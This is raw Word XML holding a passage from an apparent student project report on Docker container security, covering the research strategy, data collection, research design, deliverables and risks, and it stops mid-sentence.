      <w:bookmarkStart w:id="80" w:name="_Toc87032920"/>
      <w:r>
        <w:t>Experimental Approach 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w14:paraId="62BEB40F" w14:textId="06B8DE15" w:rsidR="00187A58" w:rsidRDefault="00F30803" w:rsidP="005A58A5">
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00A06253">
        <w:t xml:space="preserve">n another study in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-619918534"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00A06253">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00A06253">
            <w:instrText xml:space="preserve"> CITATION AAM16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00A06253">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[78]</w:t>
          </w:r>
          <w:r w:rsidR="00A06253">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A06253">
        <w:t xml:space="preserve"> Docker is more vulnerable compared to VM.</w:t>
      </w:r>
      <w:r w:rsidR="00187A58">
        <w:t xml:space="preserve"> To </w:t>
      </w:r>
      <w:r w:rsidR="00C17C57">
        <w:t>develop</w:t>
      </w:r>
      <w:r w:rsidR="00187A58">
        <w:t xml:space="preserve"> their hypothesis, the authors researched based on prior works related to the topic, specifically Docker and VM architecture</w:t>
      </w:r>
      <w:r w:rsidR="00905734">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00125AF9">
        <w:t xml:space="preserve"> To test their hypothesis, they setup</w:t>
      </w:r>
      <w:r w:rsidR="0025530B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00125AF9">
        <w:t>two servers</w:t>
      </w:r>
      <w:r w:rsidR="00C17C57">
        <w:t>, one for VM and one for Docker containers, each</w:t>
      </w:r>
      <w:r w:rsidR="00125AF9">
        <w:t xml:space="preserve"> with the same services and OS install</w:t>
      </w:r>
      <w:r w:rsidR="0025530B">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00C17C57">
        <w:t xml:space="preserve">. Then, they run a vulnerability scan to examine the risk level of each host. The authors found support for their hypothesis, showing that </w:t>
      </w:r>
      <w:r w:rsidR="002417B0">
        <w:t>containers are more exposed to security vulnerabilities compared to VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7034FC70" w14:textId="1AD551E8" w:rsidR="00D71273" w:rsidRDefault="00D71273" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc87032921"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>RESEARCH STRATEGY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w14:paraId="057CC016" w14:textId="00534414" w:rsidR="00D61293" w:rsidRDefault="00D71273" w:rsidP="00D71273">
      <w:r>
        <w:t xml:space="preserve">The strategies used to undertake this project </w:t>
      </w:r>
      <w:r w:rsidR="00B45E81">
        <w:t>involves research, experiment</w:t>
      </w:r>
      <w:r>
        <w:t>, and software development.</w:t>
      </w:r>
      <w:r w:rsidR="00B45E81">
        <w:t xml:space="preserve"> The research </w:t>
      </w:r>
      <w:r w:rsidR="00D538B7">
        <w:t>strategy include</w:t>
      </w:r>
      <w:r w:rsidR="00726E9B">
        <w:t>d a</w:t>
      </w:r>
      <w:r w:rsidR="00D538B7">
        <w:t xml:space="preserve"> literature review and background study on </w:t>
      </w:r>
      <w:r w:rsidR="00D61293">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00D538B7">
        <w:t>Docker technology</w:t>
      </w:r>
      <w:r w:rsidR="00726E9B">
        <w:t xml:space="preserve"> and was conducted using </w:t>
      </w:r>
      <w:r w:rsidR="00D61293">
        <w:t>various</w:t>
      </w:r>
      <w:r w:rsidR="00726E9B">
        <w:t xml:space="preserve"> sources, including google scholar, IEEE explorer, journals, and academic scholars</w:t>
      </w:r>
      <w:r w:rsidR="00D538B7">
        <w:t xml:space="preserve">. The background research </w:t>
      </w:r>
      <w:r w:rsidR="00D61293">
        <w:t xml:space="preserve">aim </w:t>
      </w:r>
      <w:r w:rsidR="00D538B7">
        <w:t xml:space="preserve">was to </w:t>
      </w:r>
      <w:r w:rsidR="00D61293">
        <w:t xml:space="preserve">gain </w:t>
      </w:r>
      <w:r w:rsidR="00D538B7">
        <w:t>better understanding of Docker ecosystem</w:t>
      </w:r>
      <w:r w:rsidR="00726E9B">
        <w:t xml:space="preserve"> in general, specifically into fields related to the project’s subject.</w:t>
      </w:r>
      <w:r w:rsidR="00D61293">
        <w:t xml:space="preserve"> The literature review strategy </w:t>
      </w:r>
      <w:r w:rsidR="00343803">
        <w:t>comprised</w:t>
      </w:r>
      <w:r w:rsidR="00D61293">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00343803">
        <w:t xml:space="preserve">works </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00343803">
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00343803">
        <w:t xml:space="preserve"> this project topic done by others, focusing more on current Docker security attacks and their remediation </w:t>
      </w:r>
      <w:r w:rsidR="00B24F56">
        <w:t>methodologies to assist the experiment process. This included critical information, including tools used, the attacks performed</w:t>
      </w:r>
      <w:r w:rsidR="00265820">
        <w:t>, and the experiment set up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412775B5" w14:textId="3C982A25" w:rsidR="00406E1D" w:rsidRDefault="00265820" w:rsidP="00D71273">
      <w:r>
        <w:t>Further, this project utilised scripts to run and build Docker images</w:t>
      </w:r>
      <w:r w:rsidR="00842E2C">
        <w:t xml:space="preserve"> as a software development strategy. Finally, the experiment strategy compris</w:t>
      </w:r>
      <w:r w:rsidR="00F81921">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00842E2C">
        <w:t xml:space="preserve"> both hardware and software tools to perform the security attacks. The experiment process is predominately </w:t>
      </w:r>
      <w:r w:rsidR="006E2D4E">
        <w:t>constructed based on the critical information gained from the literature review</w:t>
      </w:r>
      <w:r w:rsidR="00721CFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E2D4E">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00721CFC">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="006E2D4E">
        <w:t xml:space="preserve"> conducted on </w:t>
      </w:r>
      <w:r w:rsidR="004E1FB6">
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="006E2D4E">
        <w:t xml:space="preserve"> version 20.04 with Docker installed.</w:t>
      </w:r>
      <w:r w:rsidR="00406E1D">
        <w:t xml:space="preserve"> Each attack was experimented using different Docker images and containers, where all the containers use the default bridge network </w:t>
      </w:r>
      <w:r w:rsidR="004D6155">
        <w:t xml:space="preserve">mode </w:t>
      </w:r>
      <w:r w:rsidR="00406E1D">
        <w:t>to communicate.</w:t>
      </w:r>
      <w:r w:rsidR="00D17086">
        <w:t xml:space="preserve"> Lastly, data </w:t>
      </w:r>
      <w:r w:rsidR="004D6155">
        <w:t>from each attack</w:t>
      </w:r>
      <w:r w:rsidR="00F81921">
        <w:t xml:space="preserve"> process</w:t>
      </w:r>
      <w:r w:rsidR="004D6155">
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="00D17086">
        <w:t xml:space="preserve">collected and compared </w:t>
      </w:r>
      <w:r w:rsidR="004D6155">
        <w:t>with the</w:t>
      </w:r>
      <w:r w:rsidR="00F81921">
        <w:t xml:space="preserve"> relevant data gained from the literature review to conclude.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B162C19" w14:textId="22F20C8B" w:rsidR="00F81921" w:rsidRDefault="002B0313" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc87032922"/>
      <w:r>
        <w:t>TIME HORIZONS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w14:paraId="3AD8070A" w14:textId="6785D7FC" w:rsidR="002B0313" w:rsidRDefault="00FF2455" w:rsidP="002B0313">
      <w:r>
        <w:t xml:space="preserve">This project uses a cross-sectional approach as its time frame to study, collect and observe data. Cross-sectional is more apt for short term study, involving </w:t>
      </w:r>
      <w:r w:rsidR="00B65AD9">
        <w:t>collection and observation of data at a given point of time.</w:t>
      </w:r>
      <w:r w:rsidR="004E19BE">
        <w:t xml:space="preserve"> As for this project, the result of the experiment is collected and observed</w:t>
      </w:r>
      <w:r w:rsidR="003B172D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E19BE">
        <w:t xml:space="preserve">over a </w:t>
      </w:r>
      <w:r w:rsidR="003B172D">
        <w:t xml:space="preserve">short </w:t>
      </w:r>
      <w:r w:rsidR="004E19BE">
        <w:t>period of time</w:t>
      </w:r>
      <w:r w:rsidR="00721CFC">
        <w:t>, and t</w:t>
      </w:r>
      <w:r w:rsidR="003B172D">
        <w:t>hus</w:t>
      </w:r>
      <w:r w:rsidR="00721CFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B172D">
        <w:t xml:space="preserve">this project </w:t>
      </w:r>
      <w:r w:rsidR="004855E0">
        <w:t>uses</w:t>
      </w:r>
      <w:r w:rsidR="003B172D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00552520">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="003B172D">
        <w:t>cross-sectional method</w:t>
      </w:r>
      <w:r w:rsidR="004855E0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00951F46">
        <w:t>as data</w:t>
      </w:r>
      <w:r w:rsidR="004855E0">
        <w:t xml:space="preserve"> collect</w:t>
      </w:r>
      <w:r w:rsidR="00951F46">
        <w:t>ion</w:t>
      </w:r>
      <w:r w:rsidR="004855E0">
        <w:t xml:space="preserve"> and obser</w:t>
      </w:r>
      <w:r w:rsidR="00951F46">
        <w:t>vation occur only during the experiment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC86215" w14:textId="7ABEBBBC" w:rsidR="004855E0" w:rsidRDefault="004855E0" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc87032923"/>
      <w:r>
        <w:t>DATA COLLECTION AND ANALYSIS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w14:paraId="02350F84" w14:textId="2F314538" w:rsidR="0063410B" w:rsidRDefault="0063410B" w:rsidP="0063410B">
      <w:r>
        <w:t>Throughout the development of this project, data is collected</w:t>
      </w:r>
      <w:r w:rsidR="00134F32">
        <w:t xml:space="preserve"> through </w:t>
      </w:r>
      <w:r>
        <w:t>various methods and techniques</w:t>
      </w:r>
      <w:r w:rsidR="00134F32">
        <w:t>, including research, experimentation, and observation, to examine Docker security and provide future recommendations.</w:t>
      </w:r>
      <w:r w:rsidR="00C42343">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF0535">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00C42343">
        <w:t xml:space="preserve">he data is collected </w:t>
      </w:r>
      <w:r w:rsidR="00CF0535">
        <w:t>using</w:t>
      </w:r>
      <w:r w:rsidR="00C42343">
        <w:t xml:space="preserve"> secondary sources, such as</w:t>
      </w:r>
      <w:r w:rsidR="00CF0535">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C42343">
        <w:t>academia and journals relate</w:t>
      </w:r>
      <w:r w:rsidR="009E4E86">
        <w:t>d to the project topic. This data is then used to assist and develop the experiment</w:t>
      </w:r>
      <w:r w:rsidR="00163C8B">
        <w:t>. Then results obtained from the experiment are compared and analysed to literature review</w:t>
      </w:r>
      <w:r w:rsidR="00C052AA">
        <w:t xml:space="preserve"> findings to conclude the project</w:t>
      </w:r>
      <w:r w:rsidR="00163C8B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C052AA">
        <w:t xml:space="preserve"> In addition, this project involves </w:t>
      </w:r>
      <w:r w:rsidR="00333E13">
        <w:t>collecting data during the experiment through the observation method</w:t>
      </w:r>
      <w:r w:rsidR="007B4C71">
        <w:t xml:space="preserve">, which includes screenshots and </w:t>
      </w:r>
      <w:r w:rsidR="007B4C71">
        <w:lastRenderedPageBreak/>
        <w:t>videos to provide proof and illustrate reasons</w:t>
      </w:r>
      <w:r w:rsidR="00F63D94">
        <w:t xml:space="preserve">. Lastly, the results of the experiment are measured against </w:t>
      </w:r>
      <w:r w:rsidR="00CF0535">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00F63D94">
        <w:t>success or failure</w:t>
      </w:r>
      <w:r w:rsidR="00CF0535">
        <w:t xml:space="preserve"> of the attacks</w:t>
      </w:r>
      <w:r w:rsidR="00F63D94">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10393B7B" w14:textId="065BCAAE" w:rsidR="00CF0535" w:rsidRDefault="00CF0535" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc87032924"/>
      <w:r>
        <w:t>RESEARCH DESIGN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w14:paraId="0A7B332E" w14:textId="12475F24" w:rsidR="00CF0535" w:rsidRDefault="00EA35D0" w:rsidP="00CF0535">
      <w:r>
        <w:t>A research design is a blueprint or framework</w:t>
      </w:r>
      <w:r w:rsidR="000D42A3">
        <w:t xml:space="preserve"> containing all the methods and techniques of the research in a comprehensible and logical way</w:t>
      </w:r>
      <w:r w:rsidR="008C495D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AD61F9">
        <w:t xml:space="preserve"> As for the project, the research design supports </w:t>
      </w:r>
      <w:r w:rsidR="000D42A3">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00AD61F9">
        <w:t>multi-method approach, containing six different components</w:t>
      </w:r>
      <w:r w:rsidR="00053846">
        <w:t>, as shown in figure 8.</w:t>
      </w:r>
      <w:r w:rsidR="00E22B03">
        <w:t xml:space="preserve"> The second phase contains the literature review, which is the core element of the research process for this project. This phase assists the author to study and gain u</w:t>
      </w:r>
      <w:r w:rsidR="0039772E">
        <w:t>seful</w:t>
      </w:r>
      <w:r w:rsidR="00E22B03">
        <w:t xml:space="preserve"> information from prior related works and </w:t>
      </w:r>
      <w:r w:rsidR="0039772E">
        <w:t xml:space="preserve">critically </w:t>
      </w:r>
      <w:r w:rsidR="00E22B03">
        <w:t>analyse</w:t>
      </w:r>
      <w:r w:rsidR="0039772E">
        <w:t xml:space="preserve"> the results</w:t>
      </w:r>
      <w:r w:rsidR="00E22B03">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0039772E">
        <w:t>obtained from the experiment process. Also, the information gained from this phase has significant importance to execute and establish the experiment process.</w:t>
      </w:r>
      <w:r w:rsidR="00B02F7C">
        <w:t xml:space="preserve"> T</w:t>
      </w:r>
      <w:r w:rsidR="0039772E">
        <w:t>he result obtained during the experiment is c</w:t>
      </w:r>
      <w:r w:rsidR="00B02F7C">
        <w:t xml:space="preserve">ompared and evaluated to this phase to validate and determine the </w:t>
      </w:r>
      <w:r w:rsidR="00CB545B">
        <w:t xml:space="preserve">project’s </w:t>
      </w:r>
      <w:r w:rsidR="00B02F7C">
        <w:t>outcome.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C24E86A" w14:textId="2FEDC989" w:rsidR="00053846" w:rsidRDefault="00053846" w:rsidP="00CF0535">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4789A974" wp14:editId="0736A747">
            <wp:extent cx="4867910" cy="385445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67910" cy="3854450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5059639C" w14:textId="15F2C10D" w:rsidR="00053846" w:rsidRDefault="00053846" w:rsidP="00053846">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_Toc86858599"/>
      <w:bookmarkStart w:id="86" w:name="_Toc86867489"/>
      <w:r w:rsidRPr="00053846">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00053846">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00053846">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00053846">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00053846">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00053846">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: the research design process.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w14:paraId="34A09849" w14:textId="77777777" w:rsidR="002E3E98" w:rsidRDefault="002E3E98" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc87032925"/>
      <w:r>
        <w:t>DELIVERABLES</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w14:paraId="4D0CB24E" w14:textId="409DF6E2" w:rsidR="00C21F2B" w:rsidRDefault="002E3E98" w:rsidP="002E3E98">
      <w:r>
        <w:t>The project includes research, experiment, and implementation processes to reach its goals. The research part assists the author to get a solid understanding</w:t>
      </w:r>
      <w:r w:rsidR="00240571">
        <w:t xml:space="preserve"> of the topic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and construct the implementation</w:t>
      </w:r>
      <w:r w:rsidR="00240571">
        <w:t xml:space="preserve"> of the attacks. Also, the experiment is conducted based on the information and </w:t>
      </w:r>
      <w:r w:rsidR="00240571">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">knowledge gained from the literature review, and then the result is compared and analysed to the findings of the literature review to verify and conclude the outcome of the experiment. In general, the project provides the following </w:t>
      </w:r>
      <w:r w:rsidR="00C21F2B">
        <w:t>deliverables upon its completion</w:t>
      </w:r>
      <w:r w:rsidR="00C31417">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623F6207" w14:textId="051843E2" w:rsidR="002E3E98" w:rsidRDefault="00C21F2B" w:rsidP="00C21F2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The various techniques and methods used to launch the attacks using videos and screenshots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF0EDE7" w14:textId="2AA8D35A" w:rsidR="00C21F2B" w:rsidRDefault="00C21F2B" w:rsidP="00C21F2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vulnerable targets of the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C0DBBE" w14:textId="5CE6B33E" w:rsidR="00C21F2B" w:rsidRDefault="00C21F2B" w:rsidP="00C21F2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The outcome of the experiment either as successful or failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19773B1A" w14:textId="1F7C4A7D" w:rsidR="00C21F2B" w:rsidRDefault="00C31417" w:rsidP="00C21F2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Provide mitigation techniques to the successful attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E426689" w14:textId="235F8850" w:rsidR="00C31417" w:rsidRDefault="00C31417" w:rsidP="00C21F2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Analysis of the results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FD1E76" w14:textId="17CC78A2" w:rsidR="00C31417" w:rsidRPr="002E3E98" w:rsidRDefault="00C31417" w:rsidP="00C21F2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Identify the vulnerabilities and provide remediation techniques based on the literature review.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041038EC" w14:textId="73124EC6" w:rsidR="00734A5B" w:rsidRDefault="00734A5B" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Toc87032926"/>
      <w:r>
        <w:t>RISKS &amp; LIMITATIONS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w14:paraId="528BF566" w14:textId="2042A21E" w:rsidR="00636563" w:rsidRDefault="006E0E77" w:rsidP="00734A5B">
      <w:r>
        <w:t xml:space="preserve">As part of a project, it is a good practice to identify and analyse the risks during a project development process </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00DC01BE">
        <w:t xml:space="preserve">in order </w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> complete and achieve the project’s goals on time </w:t>
      </w:r>
      <w:r w:rsidR="00AB5D0B">
        <w:t>and to high-quality</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> standard</w:t>
      </w:r>
      <w:r w:rsidR="00AB5D0B">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AB5D0B">
        <w:t xml:space="preserve"> The project uses </w:t>
      </w:r>
      <w:r w:rsidR="00DC01BE">
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidR="004E1FB6">
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00AB5D0B">
        <w:t xml:space="preserve"> laptop to conduct the attacks within the Docker environment.</w:t>
      </w:r>
      <w:r w:rsidR="00F12473">
        <w:t xml:space="preserve"> M</w:t>
      </w:r>
      <w:r w:rsidR="00DA07E6">
        <w:t xml:space="preserve">any potential risks </w:t>
      </w:r>
      <w:r w:rsidR="00F12473">
        <w:t xml:space="preserve">inside or outside </w:t>
      </w:r>
      <w:r w:rsidR="00DA07E6">
        <w:t xml:space="preserve">could affect or delay </w:t>
      </w:r>
      <w:r w:rsidR="00DC01BE">
        <w:t>the project</w:t>
      </w:r>
      <w:r w:rsidR="00F12473">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="007B1F15">
        <w:t xml:space="preserve">mainly associated with the </w:t>
      </w:r>
      <w:r w:rsidR="004E1FB6">
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="007B1F15">
        <w:t xml:space="preserve"> laptop and Docker services</w:t>
      </w:r>
      <w:r w:rsidR="00DC01BE">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F12473">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC01BE">
        <w:t xml:space="preserve">One of the risks </w:t>
      </w:r>
      <w:r w:rsidR="00F12473">
        <w:t>is that the Docker software can cr</w:t>
      </w:r>
      <w:r w:rsidR="00071605">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00F12473">
        <w:t>sh or fail during the experiment</w:t>
      </w:r>
      <w:r w:rsidR="00071605">
        <w:t>, leading to potential data loss or damage.</w:t>
      </w:r>
      <w:r w:rsidR="00603410">
        <w:t xml:space="preserve"> To avoid such risks, a</w:t>
      </w:r>
      <w:r w:rsidR="00071605">
        <w:t xml:space="preserve">ll data </w:t>
      </w:r>
      <w:r w:rsidR="00636563">
        <w:t>is regularly backed up on the university</w:t>
      </w:r>
      <w:r w:rsidR="00603410">
        <w:t>’s</w:t>
      </w:r>
      <w:r w:rsidR="00636563">
        <w:t xml:space="preserve"> drive</w:t>
      </w:r>
      <w:r w:rsidR="00120A8C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00636563">
        <w:t>ensur</w:t>
      </w:r>
      <w:r w:rsidR="00120A8C">
        <w:t xml:space="preserve">ing </w:t>
      </w:r>
      <w:r w:rsidR="00636563">
        <w:t>reliability and accuracy.</w:t>
      </w:r>
      <w:r w:rsidR="00603410">
        <w:t xml:space="preserve"> Also, the author installed </w:t>
      </w:r>
      <w:r w:rsidR="004E1FB6">
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00603410">
        <w:t xml:space="preserve"> on a virtual box on another laptop as a reserv</w:t>
      </w:r>
      <w:r w:rsidR="00E76EA8">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00883BCF">
        <w:t xml:space="preserve"> in case the first laptop failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A24DB28" w14:textId="4CC8912D" w:rsidR="00045747" w:rsidRDefault="00B118CD" w:rsidP="00734A5B">
      <w:r>
        <w:t xml:space="preserve">Further, the project has a limited time to be completed, and thus external factors and poor time management can </w:t>
      </w:r>
      <w:r w:rsidR="006A770B">
        <w:t>adversely affect the project’s progress</w:t>
      </w:r>
      <w:r w:rsidR="009F550F">
        <w:t xml:space="preserve">. Therefore, a Gantt chart is used </w:t>
      </w:r>
      <w:r w:rsidR="00213435">
        <w:t>to monitor</w:t>
      </w:r>
      <w:r w:rsidR="009F550F">
        <w:t xml:space="preserve"> and manage each task</w:t>
      </w:r>
      <w:r w:rsidR="00213435">
        <w:t xml:space="preserve"> effectively,</w:t>
      </w:r>
      <w:r w:rsidR="00045747">
        <w:t xml:space="preserve"> and more time is given to th</w:t>
      </w:r>
      <w:r w:rsidR="00213435">
        <w:t xml:space="preserve">e critical tasks of the project. Besides, this project involves conducting security attacks on </w:t>
      </w:r>
